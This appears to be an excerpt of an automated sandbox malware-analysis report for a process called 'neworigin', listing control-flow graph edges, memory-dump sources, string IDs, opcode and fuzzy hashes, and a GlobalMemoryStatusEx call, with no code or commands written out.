                                                                                                                  control_flow_graph 258 627b760-627b782 259 627b784-627b787 258->259 260 627b7ae-627b7b1 259->260 261 627b789-627b78d 259->261 264 627b7b3-627b7b7 260->264 265 627b7c8-627b7cb 260->265 262 627bb05-627bb3e 261->262 263 627b793-627b7a3 261->263 275 627bb40-627bb43 262->275 273 627b936-627b93a 263->273 274 627b7a9 263->274 264->262 266 627b7bd-627b7c3 264->266 267 627b7d2-627b7d5 265->267 268 627b7cd-627b7cf 265->268 266->265 271 627b7d7-627b7dd 267->271 272 627b7e2-627b7e5 267->272 268->267 271->272 276 627b7e7-627b7eb 272->276 277 627b7f9-627b7fc 272->277 273->262 280 627b940-627b950 273->280 274->260 281 627bb66-627bb69 275->281 282 627bb45-627bb61 275->282 276->262 283 627b7f1-627b7f4 276->283 278 627bad5-627bad6 277->278 279 627b802-627b805 277->279 286 627badb-627bade 278->286 284 627b807-627b864 call 6276698 279->284 285 627b869-627b86c 279->285 304 627b956 280->304 305 627ba9a-627ba9e 280->305 287 627bdd5-627bdd7 281->287 288 627bb6f-627bb97 281->288 282->281 283->277 284->285 289 627b86e-627b877 285->289 290 627b87c-627b87f 285->290 293 627bae0-627bae5 286->293 294 627bae8-627baea 286->294 291 627bdde-627bde1 287->291 292 627bdd9 287->292 338 627bba1-627bbe5 288->338 339 627bb99-627bb9c 288->339 289->290 297 627b8a1-627b8a4 290->297 298 627b881-627b89c 290->298 291->275 299 627bde7-627bdf0 291->299 292->291 293->294 302 627baf1-627baf4 294->302 303 627baec 294->303 309 627b8a6-627b8a9 297->309 310 627b8ae-627b8b1 297->310 298->297 302->259 308 627bafa-627bb04 302->308 303->302 312 627b95b-627b95e 304->312 305->262 311 627baa0-627bab0 305->311 309->310 318 627b8b3-627b8bc 310->318 319 627b8c1-627b8c4 310->319 311->278 333 627bab2 311->333 313 627b960-627b966 312->313 314 627b978-627b97b 312->314 313->262 320 627b96c-627b973 313->320 321 627b992-627b995 314->321 322 627b97d-627b981 314->322 318->319 324 627b8c6-627b8db 319->324 325 627b903-627b906 319->325 320->314 321->278 329 627b99b-627b99e 321->329 322->262 326 627b987-627b98d 322->326 324->262 342 627b8e1-627b8fe 324->342 327 627b916-627b919 325->327 328 627b908-627b911 325->328 326->321 334 627b91f-627b922 327->334 335 627babc-627bac5 327->335 328->327 336 627b9b0-627b9b3 329->336 337 627b9a0 329->337 340 627bab7-627baba 333->340 343 627b924-627b92a 334->343 344 627b931-627b934 334->344 349 627bacb 335->349 350 627ba0a-627ba13 335->350 346 627b9c5-627b9c8 336->346 347 627b9b5-627b9c0 336->347 353 627b9a8-627b9ab 337->353 375 627bbeb-627bbf4 338->375 376 627bdca-627bdd4 338->376 339->299 340->335 348 627bad0-627bad3 340->348 342->325 343->313 351 627b92c 343->351 344->273 344->312 355 627b9ca-627b9ce 346->355 356 627b9d9-627b9dc 346->356 347->346 348->278 348->286 349->348 350->262 352 627ba19-627ba20 350->352 351->344 361 627ba25-627ba28 352->361 353->336 355->318 357 627b9d4 355->357 359 627b9de-627b9e7 356->359 360 627b9ec-627b9ef 356->360 357->356 359->360 360->343 364 627b9f5-627b9f8 360->364 361->278 365 627ba2e-627ba31 361->365 367 627ba05-627ba08 364->367 368 627b9fa-627ba00 364->368 369 627ba54-627ba57 365->369 370 627ba33-627ba4f 365->370 367->350 367->361 368->367 373 627ba95-627ba98 369->373 374 627ba59-627ba6e 369->374 370->369 373->305 373->340 374->262 382 627ba74-627ba90 374->382 379 627bdc0-627bdc5 375->379 380 627bbfa-627bc66 call 6276698 375->380 379->376 392 627bd60-627bd75 380->392 393 627bc6c-627bc71 380->393 382->373 392->379 395 627bc73-627bc79 393->395 396 627bc8d 393->396 398 627bc7f-627bc81 395->398 399 627bc7b-627bc7d 395->399 397 627bc8f-627bc95 396->397 401 627bc97-627bc9d 397->401 402 627bcaa-627bcb7 397->402 400 627bc8b 398->400 399->400 400->397 403 627bca3 401->403 404 627bd4b-627bd5a 401->404 409 627bccf-627bcdc 402->409 410 627bcb9-627bcbf 402->410 403->402 405 627bd12-627bd1f 403->405 406 627bcde-627bceb 403->406 404->392 404->393 418 627bd37-627bd44 405->418 419 627bd21-627bd27 405->419 416 627bd03-627bd10 406->416 417 627bced-627bcf3 406->417 409->404 412 627bcc3-627bcc5 410->412 413 627bcc1 410->413 412->409 413->409 416->404 420 627bcf7-627bcf9 417->420 421 627bcf5 417->421 418->404 422 627bd2b-627bd2d 419->422 423 627bd29 419->423 420->416 421->416 422->418 423->418
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.2434338464.0000000006270000.00000040.00000800.00020000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_6270000_neworigin.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: $]q$$]q$$]q$$]q$$]q$$]q
                                                                                                                  • API String ID: 0-3723351465
                                                                                                                  • Opcode ID: ac1a1fb4e9a3c88a6c2e4de79078704ef5fbeef9de101f74716587ac997455fe
                                                                                                                  • Instruction ID: e669d1f296b30e7f8023f0315922369b1f879bc7e1cdcb0745513f71c4132196
                                                                                                                  • Opcode Fuzzy Hash: ac1a1fb4e9a3c88a6c2e4de79078704ef5fbeef9de101f74716587ac997455fe
                                                                                                                  • Instruction Fuzzy Hash: 73026F70E2010A8FDF64DF68C480AADB7B2FB85315F20892AE815DB355DB75ED81CB91

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 426 6279250-6279275 427 6279277-627927a 426->427 428 6279280-6279295 427->428 429 6279b38-6279b3b 427->429 437 6279297-627929d 428->437 438 62792ad-62792c3 428->438 430 6279b61-6279b63 429->430 431 6279b3d-6279b5c 429->431 432 6279b65 430->432 433 6279b6a-6279b6d 430->433 431->430 432->433 433->427 436 6279b73-6279b7d 433->436 439 62792a1-62792a3 437->439 440 627929f 437->440 443 62792ce-62792d0 438->443 439->438 440->438 444 62792d2-62792d8 443->444 445 62792e8-6279359 443->445 446 62792dc-62792de 444->446 447 62792da 444->447 456 6279385-62793a1 445->456 457 627935b-627937e 445->457 446->445 447->445 462 62793a3-62793c6 456->462 463 62793cd-62793e8 456->463 457->456 462->463 468 6279413-627942e 463->468 469 62793ea-627940c 463->469 474 6279453-6279461 468->474 475 6279430-627944c 468->475 469->468 476 6279463-627946c 474->476 477 6279471-62794eb 474->477 475->474 476->436 483 62794ed-627950b 477->483 484 6279538-627954d 477->484 488 6279527-6279536 483->488 489 627950d-627951c 483->489 484->429 488->483 488->484 489->488
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.2434338464.0000000006270000.00000040.00000800.00020000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_6270000_neworigin.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: $]q$$]q$$]q$$]q
                                                                                                                  • API String ID: 0-858218434
                                                                                                                  • Opcode ID: 5bbdbf8df88fcc4aafbd7f79023e3796cd8daebcd181086bc68f9848f7898d68
                                                                                                                  • Instruction ID: 27c26e00a947cf2df0a3a827d46d9c421ec935d260b2cda02764383613879f36
                                                                                                                  • Opcode Fuzzy Hash: 5bbdbf8df88fcc4aafbd7f79023e3796cd8daebcd181086bc68f9848f7898d68
                                                                                                                  • Instruction Fuzzy Hash: 38913F30F1021A9FDB64DB65D850BAEB7F2BF85304F108569D809EB748EE709D868B91

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 492 627d060-627d07b 493 627d07d-627d080 492->493 494 627d082-627d0c4 493->494 495 627d0c9-627d0cc 493->495 494->495 496 627d115-627d118 495->496 497 627d0ce-627d110 495->497 498 627d13b-627d13e 496->498 499 627d11a-627d136 496->499 497->496 501 627d140-627d142 498->501 502 627d14d-627d150 498->502 499->498 505 627d549 501->505 506 627d148 501->506 507 627d152-627d161 502->507 508 627d199-627d19c 502->508 512 627d54c-627d558 505->512 506->502 514 627d163-627d168 507->514 515 627d170-627d17c 507->515 510 627d19e-627d1a0 508->510 511 627d1ab-627d1ae 508->511 516 627d407-627d410 510->516 517 627d1a6 510->517 518 627d1f7-627d1fa 511->518 519 627d1b0-627d1f2 511->519 521 627d55e-627d84b 512->521 522 627d1fc-627d20b 512->522 514->515 523 627d182-627d194 515->523 524 627da7d-627dab6 515->524 526 627d412-627d417 516->526 527 627d41f-627d42b 516->527 517->511 518->522 528 627d243-627d246 518->528 519->518 704 627da72-627da7c 521->704 705 627d851-627d857 521->705 529 627d20d-627d212 522->529 530 627d21a-627d226 522->530 523->508 545 627dab8-627dabb 524->545 526->527 534 627d431-627d445 527->534 535 627d53c-627d541 527->535 540 627d28f-627d292 528->540 541 627d248-627d28a 528->541 529->530 530->524 537 627d22c-627d23e 530->537 534->505 557 627d44b-627d45d 534->557 535->505 537->528 542 627d294-627d2d6 540->542 543 627d2db-627d2de 540->543 541->540 542->543 546 627d2e0-627d2e5 543->546 547 627d2e8-627d2eb 543->547 551 627dade-627dae1 545->551 552 627dabd-627dad9 545->552 546->547 560 627d334-627d337 547->560 561 627d2ed-627d32f 547->561 562 627dae3 call 627dbd5 551->562 563 627daf0-627daf3 551->563 552->551 580 627d481-627d483 557->580 581 627d45f-627d465 557->581 560->512 570 627d33d-627d340 560->570 561->560 578 627dae9-627daeb 562->578 564 627db26-627db28 563->564 565 627daf5-627db21 563->565 573 627db2f-627db32 564->573 574 627db2a 564->574 565->564 571 627d342-627d384 570->571 572 627d389-627d38c 570->572 571->572 583 627d3d5-627d3d8 572->583 584 627d38e-627d3d0 572->584 573->545 579 627db34-627db43 573->579 574->573 578->563 605 627db45-627dba8 call 6276698 579->605 606 627dbaa-627dbbf 579->606 600 627d48d-627d499 580->600 589 627d467 581->589 590 627d469-627d475 581->590 593 627d3f5-627d3f7 583->593 594 627d3da-627d3f0 583->594 584->583 597 627d477-627d47f 589->597 590->597 601 627d3fe-627d401 593->601 602 627d3f9 593->602 594->593 597->600 620 627d4a7 600->620 621 627d49b-627d4a5 600->621 601->493 601->516 602->601 605->606 627 627d4ac-627d4ae 620->627 621->627 627->505 630 627d4b4-627d4d0 call 6276698 627->630 643 627d4d2-627d4d7 630->643 644 627d4df-627d4eb 630->644 643->644 644->535 645 627d4ed-627d53a 644->645 645->505 706 627d866-627d86f 705->706 707 627d859-627d85e 705->707 706->524 708 627d875-627d888 706->708 707->706 710 627da62-627da6c 708->710 711 627d88e-627d894 708->711 710->704 710->705 712 627d896-627d89b 711->712 713 627d8a3-627d8ac 711->713 712->713 713->524 714 627d8b2-627d8d3 713->714 717 627d8d5-627d8da 714->717 718 627d8e2-627d8eb 714->718 717->718 718->524 719 627d8f1-627d90e 718->719 719->710 722 627d914-627d91a 719->722 722->524 723 627d920-627d939 722->723 725 627da55-627da5c 723->725 726 627d93f-627d966 723->726 725->710 725->722 726->524 729 627d96c-627d976 726->729 729->524 730 627d97c-627d993 729->730 732 627d995-627d9a0 730->732 733 627d9a2-627d9bd 730->733 732->733 733->725 738 627d9c3-627d9dc call 6276698 733->738 742 627d9de-627d9e3 738->742 743 627d9eb-627d9f4 738->743 742->743 743->524 744 627d9fa-627da4e 743->744 744->725
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.2434338464.0000000006270000.00000040.00000800.00020000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_6270000_neworigin.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: $]q$$]q$$]q
                                                                                                                  • API String ID: 0-182748909
                                                                                                                  • Opcode ID: 1b4ec47ed4ec1ecf0684449a325eb2ebcd7e46a4fe8bd99f4fe092659279d530
                                                                                                                  • Instruction ID: 9fcb0d067991383fdc9622db1e4476adeff0bde18b652fddcce5f6a25a09ddd7
                                                                                                                  • Opcode Fuzzy Hash: 1b4ec47ed4ec1ecf0684449a325eb2ebcd7e46a4fe8bd99f4fe092659279d530
                                                                                                                  • Instruction Fuzzy Hash: E9625F30A1020A8FCB55EB68D590A5DB7F3FF84344B20CA29E8059F359DB75ED86CB81

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 752 6274c88-6274cac 753 6274cae-6274cb1 752->753 754 6274cb3-6274ccd 753->754 755 6274cd2-6274cd5 753->755 754->755 756 62753b4-62753b6 755->756 757 6274cdb-6274dd3 755->757 758 62753bd-62753c0 756->758 759 62753b8 756->759 775 6274e56-6274e5d 757->775 776 6274dd9-6274e26 call 6275531 757->776 758->753 762 62753c6-62753d3 758->762 759->758 777 6274e63-6274ed3 775->777 778 6274ee1-6274eea 775->778 789 6274e2c-6274e48 776->789 795 6274ed5 777->795 796 6274ede 777->796 778->762 792 6274e53-6274e54 789->792 793 6274e4a 789->793 792->775 793->792 795->796 796->778
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.2434338464.0000000006270000.00000040.00000800.00020000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_6270000_neworigin.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: fbq$XPbq$\Obq
                                                                                                                  • API String ID: 0-4057264190
                                                                                                                  • Opcode ID: df102921f0865dc1c43716a986a3bf4845aa09deec548d281d97a1d516fcff2f
                                                                                                                  • Instruction ID: 5bfcdbef2002854ca16d8e4cbfdc40edfe01d579e7c71a33c554dae8dfcb5d8a
                                                                                                                  • Opcode Fuzzy Hash: df102921f0865dc1c43716a986a3bf4845aa09deec548d281d97a1d516fcff2f
                                                                                                                  • Instruction Fuzzy Hash: BB619330F102199FEB54DFB4C854BAEBBF2FB88310F208529E519AB395DB758D418B91

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1780 6279241-6279275 1782 6279277-627927a 1780->1782 1783 6279280-6279295 1782->1783 1784 6279b38-6279b3b 1782->1784 1792 6279297-627929d 1783->1792 1793 62792ad-62792c3 1783->1793 1785 6279b61-6279b63 1784->1785 1786 6279b3d-6279b5c 1784->1786 1787 6279b65 1785->1787 1788 6279b6a-6279b6d 1785->1788 1786->1785 1787->1788 1788->1782 1791 6279b73-6279b7d 1788->1791 1794 62792a1-62792a3 1792->1794 1795 627929f 1792->1795 1798 62792ce-62792d0 1793->1798 1794->1793 1795->1793 1799 62792d2-62792d8 1798->1799 1800 62792e8-6279359 1798->1800 1801 62792dc-62792de 1799->1801 1802 62792da 1799->1802 1811 6279385-62793a1 1800->1811 1812 627935b-627937e 1800->1812 1801->1800 1802->1800 1817 62793a3-62793c6 1811->1817 1818 62793cd-62793e8 1811->1818 1812->1811 1817->1818 1823 6279413-627942e 1818->1823 1824 62793ea-627940c 1818->1824 1829 6279453-6279461 1823->1829 1830 6279430-627944c 1823->1830 1824->1823 1831 6279463-627946c 1829->1831 1832 6279471-62794eb 1829->1832 1830->1829 1831->1791 1838 62794ed-627950b 1832->1838 1839 6279538-627954d 1832->1839 1843 6279527-6279536 1838->1843 1844 627950d-627951c 1838->1844 1839->1784 1843->1838 1843->1839 1844->1843
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.2434338464.0000000006270000.00000040.00000800.00020000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_6270000_neworigin.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: $]q$$]q
                                                                                                                  • API String ID: 0-127220927
                                                                                                                  • Opcode ID: 21ca136e84f5be4d2f84ed3e22402b1698e4eaffde7a6798ac43bd0a7a5550f8
                                                                                                                  • Instruction ID: 660be52aca6eca378da00f293ad1d05ac89346234ecfe41274a84e86d29c051f
                                                                                                                  • Opcode Fuzzy Hash: 21ca136e84f5be4d2f84ed3e22402b1698e4eaffde7a6798ac43bd0a7a5550f8
                                                                                                                  • Instruction Fuzzy Hash: 63515131F102069FDB55EBB5D890BAF77F6AB84300F10846AD809DB758EE709C468B91

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1847 6274c78-6274cac 1849 6274cae-6274cb1 1847->1849 1850 6274cb3-6274ccd 1849->1850 1851 6274cd2-6274cd5 1849->1851 1850->1851 1852 62753b4-62753b6 1851->1852 1853 6274cdb-6274dd3 1851->1853 1854 62753bd-62753c0 1852->1854 1855 62753b8 1852->1855 1871 6274e56-6274e5d 1853->1871 1872 6274dd9-6274e26 call 6275531 1853->1872 1854->1849 1858 62753c6-62753d3 1854->1858 1855->1854 1873 6274e63-6274ed3 1871->1873 1874 6274ee1-6274eea 1871->1874 1885 6274e2c-6274e48 1872->1885 1891 6274ed5 1873->1891 1892 6274ede 1873->1892 1874->1858 1888 6274e53-6274e54 1885->1888 1889 6274e4a 1885->1889 1888->1871 1889->1888 1891->1892 1892->1874
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.2434338464.0000000006270000.00000040.00000800.00020000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_6270000_neworigin.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: fbq$XPbq
                                                                                                                  • API String ID: 0-2292610095
                                                                                                                  • Opcode ID: 58e90bf1423ddda31b9ffce8a4ea9351dc223227b220104484cd4f73fcdd2214
                                                                                                                  • Instruction ID: b24a2bc9f8ea1e50804eb3c5fab1c33baa7321536d6ddcde488ae5c4c39dec8a
                                                                                                                  • Opcode Fuzzy Hash: 58e90bf1423ddda31b9ffce8a4ea9351dc223227b220104484cd4f73fcdd2214
                                                                                                                  • Instruction Fuzzy Hash: C0518F30B102099FEB54DFB5C854BAEBBF6BF88700F208529E509AB395DA758C418B91

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1895 9eef18-9eef23 1896 9eef4d-9eef6c call 9ee680 1895->1896 1897 9eef25-9eef4c 1895->1897 1902 9eef6e-9eef71 1896->1902 1903 9eef72-9eefd1 1896->1903 1910 9eefd7-9ef064 GlobalMemoryStatusEx 1903->1910 1911 9eefd3-9eefd6 1903->1911 1915 9ef06d-9ef095 1910->1915 1916 9ef066-9ef06c 1910->1916 1916->1915
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.2320649240.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_9e0000_neworigin.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: b1de59f08d31f07848531281b24fff3dd0f86889f9d3e6dedd423f02e77c163b
                                                                                                                  • Instruction ID: 7c584893916f9957457ec66cbf037945e69e7cc1b0ee4d6c53eae8c75bd292a1
                                                                                                                  • Opcode Fuzzy Hash: b1de59f08d31f07848531281b24fff3dd0f86889f9d3e6dedd423f02e77c163b
                                                                                                                  • Instruction Fuzzy Hash: 87411472D003499FCB14DFBAD8006EEBBF5AF89310F05896AD504A7241DB749885CBE1

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1919 9ee680-9ef064 GlobalMemoryStatusEx 1922 9ef06d-9ef095 1919->1922 1923 9ef066-9ef06c 1919->1923 1923->1922
                                                                                                                  APIs
                                                                                                                  • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,009EEF6A), ref: 009EF057
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.2320649240.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_9e0000_neworigin.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: GlobalMemoryStatus
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1890195054-0
                                                                                                                  • Opcode ID: e8cea3ea78755d38fbeb0f0336871fc735f58e135bdf0c2e071b3465962237e3
                                                                                                                  • Instruction ID: 7c620f6a36c272439fc985b7b47f57350d7389394ed11564db72d9bba8b8d3fb
                                                                                                                  • Opcode Fuzzy Hash: e8cea3ea78755d38fbeb0f0336871fc735f58e135bdf0c2e071b3465962237e3
                                                                                                                  • Instruction Fuzzy Hash: A71103B1C0465A9BCB10DF9AD544BEEFBF4AB48320F11856AD818B7241D378A944CFE5
                                                                                                                  APIs
                                                                                                                  • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,009EEF6A), ref: 009EF057
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.2320649240.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_9e0000_neworigin.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: GlobalMemoryStatus
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1890195054-0
                                                                                                                  • Opcode ID: 02eeac97058e4a76119360b2e3116d0ecb15172b987cc2b5480cf26db39a2cd4
                                                                                                                  • Instruction ID: 68a5b2af4b2a7dcb06d3293e2a7bc2e8c61cad2b0b55f35961ec77b78c073b84
                                                                                                                  • Opcode Fuzzy Hash: 02eeac97058e4a76119360b2e3116d0ecb15172b987cc2b5480cf26db39a2cd4
                                                                                                                  • Instruction Fuzzy Hash: 6B1114B1C0065A9FCB20CFAAD445BEEFBF4AF48310F15816AD418B7241D378A945CFA1
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.2434338464.0000000006270000.00000040.00000800.00020000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_6270000_neworigin.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: PH]q
                                                                                                                  • API String ID: 0-3168235125
                                                                                                                  • Opcode ID: d20aec474a51282cc505fe05b4487b319b5ed3195ebcec9f3f347120af2a028c
                                                                                                                  • Instruction ID: 8a9e6d4b0d5237bd0bfa8d67c52210fbd60f1687c02e70fbe3c98e97e6a5e1b4
                                                                                                                  • Opcode Fuzzy Hash: d20aec474a51282cc505fe05b4487b319b5ed3195ebcec9f3f347120af2a028c
                                                                                                                  • Instruction Fuzzy Hash: 6041A670E2024A9FDB559F75D890B9EBBB2FF85300F20492DE805DB241DBB1A945CB91
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.2434338464.0000000006270000.00000040.00000800.00020000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_6270000_neworigin.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: PH]q
                                                                                                                  • API String ID: 0-3168235125
                                                                                                                  • Opcode ID: 303dbd3825b4039d9271af0a70a6e1049b65882a21657b6aa2d3aa8a2655c8de
                                                                                                                  • Instruction ID: f5be4dfb2e2224030fc3b615c0fff4dbb75e9e0e33a2c3a4821cd8ac242194b5
                                                                                                                  • Opcode Fuzzy Hash: 303dbd3825b4039d9271af0a70a6e1049b65882a21657b6aa2d3aa8a2655c8de
                                                                                                                  • Instruction Fuzzy Hash: 3131CF30B20206CFDB59AB74D464A6F7BE3AFC9200F208528D806DB385DE75DE42CB95
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.2434338464.0000000006270000.00000040.00000800.00020000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_6270000_neworigin.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: $]q
                                                                                                                  • API String ID: 0-1007455737
                                                                                                                  • Opcode ID: 1035f9e9085e7dc1575f4f8def02232dab0f5585925000a2a0bb9472c69d361e
                                                                                                                  • Instruction ID: 0e6f2e9c101e1d6e53532fdffc54933474b6b63fd693a96804b51c3b6b344453
                                                                                                                  • Opcode Fuzzy Hash: 1035f9e9085e7dc1575f4f8def02232dab0f5585925000a2a0bb9472c69d361e
                                                                                                                  • Instruction Fuzzy Hash: 68F0FF31F302029FDFA89A98F9A8E7873A9EB80310F144876DD09DB208C7F9D905D781
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.2434338464.0000000006270000.00000040.00000800.00020000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_6270000_neworigin.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 94e9fbbc81e9744094eef44fba2a828ce04201eb9b1f5dcf7ec77c5aeb315bca
                                                                                                                  • Instruction ID: aa19cac8ddbebe31f5ac4e09f2a30f658207497d09b6e839a3396499ea837594
                                                                                                                  • Opcode Fuzzy Hash: 94e9fbbc81e9744094eef44fba2a828ce04201eb9b1f5dcf7ec77c5aeb315bca
                                                                                                                  • Instruction Fuzzy Hash: CD816130B106069FDB54EFB9D454AAEB7F7AF84304F108529D80AEB394DB70DC468B92
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.2434338464.0000000006270000.00000040.00000800.00020000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_6270000_neworigin.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: e011bcc06035c7ca8ae7a75a166855938cb776455424fad09a2ebca110ed6157
                                                                                                                  • Instruction ID: 5c41652f422f7ca46f6c46e561a5ef38e6a829293bf6d8cbcc8e3bd0922729a8
                                                                                                                  • Opcode Fuzzy Hash: e011bcc06035c7ca8ae7a75a166855938cb776455424fad09a2ebca110ed6157
                                                                                                                  • Instruction Fuzzy Hash: 7861F371F104124FDB54AA7EC880AAFBAD7AFD4610B244479E80EDB360DE75DD0287D1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.2434338464.0000000006270000.00000040.00000800.00020000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_6270000_neworigin.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: f46288ef47848d2f82eb0832d6b957f04c389d1874df881ab2ff0cb5d728f0c1
                                                                                                                  • Instruction ID: 80b8d1a469fbda0a56e586bf8454ec013b42301afc5be76cca0f07664b000cef
                                                                                                                  • Opcode Fuzzy Hash: f46288ef47848d2f82eb0832d6b957f04c389d1874df881ab2ff0cb5d728f0c1
                                                                                                                  • Instruction Fuzzy Hash: 36913D30E1021A9FDF60DF68C890B9DB7B1FF89304F20C599D549AB255DB70AA85CF91
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.2434338464.0000000006270000.00000040.00000800.00020000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_6270000_neworigin.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 72ff7706217cac48029f5b9293bd5e8bc1dbafff36fc8199cbf81fc0e3d64036
                                                                                                                  • Instruction ID: 8bd49930af370a25ab21d6da0597d6f658532877b6633ea467f8fcff458c554c
                                                                                                                  • Opcode Fuzzy Hash: 72ff7706217cac48029f5b9293bd5e8bc1dbafff36fc8199cbf81fc0e3d64036
                                                                                                                  • Instruction Fuzzy Hash: 94912C30E1061A8BDF60DF68C890B9DB7B1FF89304F20C599D549BB255DB70AA85CF91
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.2434338464.0000000006270000.00000040.00000800.00020000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_6270000_neworigin.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: a4a05b8ab2f5207d710c1572b535ca9d4e49f358af3f31aa381e550af375dbf4
                                                                                                                  • Instruction ID: 14727ea73a5bffd58c2fa7d9943f36d184839e03cf77a740f9ac4e8a78592385
